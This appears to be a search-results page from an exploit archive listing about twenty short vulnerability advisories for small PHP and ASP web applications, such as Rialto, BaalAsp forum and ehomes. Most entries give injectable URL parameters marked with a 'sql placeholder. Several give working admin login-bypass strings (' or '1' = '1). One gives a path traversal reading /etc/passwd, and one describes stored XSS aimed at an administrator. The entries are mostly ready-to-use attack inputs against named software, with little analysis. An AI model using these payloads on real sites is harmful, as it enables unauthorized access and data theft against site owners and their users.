39 matches found
pwp-rfilfi.txt
php web portail remote file include & local file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include & local file include risk : high local file include :...
FishCart [injection sql]
vendor site: http://fishcart.org/ product :fish cart bug:injection sql risk : medium injection sql : /display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='sql change the cartid value with yours laurent gaffie http://s-a-p.ca/ contact: [email protected]...
lel-sql.txt
vendor site: http://softacid.net/ product:Link Exchange Lite bug: injection sql risk : high injection sql post : /search.asp post your sql query into the search engine field injection sql get: /linkslist.asp?psearch='sql laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [email protected]...
creadirector.txt
vendor site: http://www.creascripts.com/ product:creadirectory bug: injection sql & xss risk : medium injection sql: /search.asp?search=1&submit=Search&category='sql xss: /addlisting.asp?cat=xss /search.asp?search=xss laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [email protected]...
Link Exchange Lite [injection sql]
vendor site: http://softacid.net/ product:Link Exchange Lite bug: injection sql risk : high injection sql post : /search.asp post your sql query into the search engine field injection sql get: /linkslist.asp?psearch='sql laurent gaffi & benjamin moss http://s-a-p.ca/ contact: [email protected]...
creadirectory [injection sql & xss]
vendor site: http://www.creascripts.com/ product:creadirectory bug: injection sql & xss risk : medium injection sql: /search.asp?search=1&submit=Search&category='sql xss: /addlisting.asp?cat=xss /search.asp?search=xss laurent gaffi & benjamin moss http://s-a-p.ca/ contact: [email protected]...
ehomes [multiples injections sql]
vendor site: http://enthrallweb.us/ product : ehomes bug:injection sql risk : medium injection sql : /dircat.asp?cid='sql /dirSub.asp?sid='sql /types.asp?TYPEID='sql /homeDetail.asp?ADID='sql /result.asp?city=1&cat='sql /compareHomes.asp?compare='sql /compareHomes.asp?compare=Compare&clear='sql...
Rialto 1.6[admin login bypass & multiples injections sql]
vendor site: http://www.grandora.com/ product : Rialto 1.6 bug:multiples injection sql , login bypass , xss risk : high ! admin login bypass : /admin/default.asp username: ' or '1' = '1 passwd: ' or '1' = '1 injection sql : /listfull.asp?ID='sql /listmain.asp?cat='sql /printmain.asp?ID='sql...
Classified System [injection sql]
vendor site: http://www.vspin.net/ product :Classified System bug:injection sql risk : medium injection sql : /cat.asp?cat='sql /search.asp?in=y&keyword='sql /search.asp?in=y&keyword=1&submit=Search&order='sql /search.asp?in=y&keyword=1&submit=Search&order=tblclassads.colid&sort='sql...
klf-realty [injection sql]
vendor site:http://klf-design.com/ product :klf-realty bug:injection sql risk : medium injection sql : /searchlisting.asp?category='sql /detail.asp?propertyid='sql /searchlisting.asp?agent='sql laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: [email protected]...
aBitWhizzy - abitwhizzy.php Information Disclosure
aBitWhizzy - abitwhizzy.php Information Disclosure aBitWhizzy local file include vendor site: http://www.unverse.net/abitwhizzy/ product : aBitWhizzy bug:local file include global risk : high http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd laurent gaffié & benjamin mossé...
eClassifieds.txt
vendor site: http://enthrallweb.com/ product : eClassifieds bug:injection sql risk : medium injection sql : /ad.asp?ADID='sql /ad.asp?catid='sql /dircat.asp?cid='sql /dirSub.asp?sid='sql /ad.asp?catid=35&subid='sql /ad.asp?catid=35&subid=102&adid='sql laurent gaffié & benjamin mossé...
vikiboard012.txt
vendor site:http://vikingboard.com/ product:Vikingboard 0.1.2 bug:local file include & multiples permanent xss risk:medium error sql : /members.php?s=-80 xss permanent : - in private message , an attacker can send a pm to an administrator with some javascript into the subject field an get his...
20/20 auto gallery [ multiples injection sql ]
vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='sql http://site.com/vehiclelistings.asp?categoryIDlist='sql http://site.com/vehiclelistings.asp?saletype='sql...
Active News Manager [ injection sql (post&get)]
vendor site:http://www.dotnetindex.com/ product:Active News Manager bug:injection sql risk:medium injection sql get http://site.com/activenews/activeNewscategories.asp?catID='sql http://site.com/activeNewscomments.asp?articleID='sql injection sqlpost : in the search engine:...
2020autogal.txt
vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='sql http://site.com/vehiclelistings.asp?categoryIDlist='sql http://site.com/vehiclelistings.asp?saletype='sql...
Infinitytechs Restaurants CM
product:Infinitytechs Restaurants CM bug:injection sql risk:medium injection sql: /rating.asp?id='sql /mealrest.asp?mealid='sql /resdetails.asp?resid='sql laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: [email protected]...
20/20 datashed [ multiples injection sql ]
vendor site:http://www.2020applications.com/ product:20/20 datashed bug:injection sql risk:high injection sql get : /f-email.asp?strPeopleID=1&itemID='sql /listings.asp?peopleID='sql /listings.asp?sortorder='sql laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: [email protected]...
Dating Site [ login bypass & xss]
vendor site:http://www.hotwebapp.com/ product:Dating Site bug:injection sql & xss risk:high log in with : username = ' or '1' = '1 passwd = ' or '1' = '1 xss get : /loginform.asp?msg=xss here laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: [email protected]...
BaalAsp forum [login bypass ,injections sql(post), xss(post)]
vendor site:http://baalasp.com/ product:BaalAsp forum bug:login bypass, injection sql post, xss post risk:high authentification bypass : admin login bypass == /adminlogin.asp passwd: 'or''=' user login bypass == /userlogin.asp user: 'or''=' passwd: 'or''=' injection sql post == /search.asp...